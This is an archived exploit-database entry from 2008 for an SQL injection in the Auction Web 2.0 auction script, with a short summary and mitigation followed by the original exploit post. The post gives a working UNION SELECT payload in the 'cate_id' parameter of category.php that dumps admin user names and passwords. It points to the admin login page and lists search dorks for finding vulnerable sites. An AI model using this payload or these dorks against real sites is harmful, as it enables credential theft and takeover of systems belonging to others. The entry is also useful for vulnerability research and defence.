Auction Web 2.0 SQL Injection Vulnerability

vendor:

Auction Web 2.0

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Auction Web 2.0

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Auction Web 2.0 SQL Injection Vulnerability

A vulnerability exists in the Auction Web 2.0 application, which allows an attacker to inject malicious SQL queries via the 'cate_id' parameter in the 'category.php' script. An attacker can exploit this vulnerability to gain access to the admin panel by using the 'admin/index.php' script. The exploit code is available at http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################
#
#     Auction Web 2.0  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#=========================================================
#    HomE script : http://www.ajauctionpro.com/ajhome.php
#     
#    Demo : http://www.ajauctionpro.com/auction_web2.0/   
#    
#          DorK :  Powered By AJ Auction Web
#          DorK :  Powered By Auction Web
#     
##########################################################

Exploit:   

http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--


Admin login

admin/index.php

################################################################################
#####################################( Greetz )#################################
#                                                                              #
#           tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA              #       
#                mos_chori / Rafi / FAHD / Iraq Hackers /                      #       
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-19]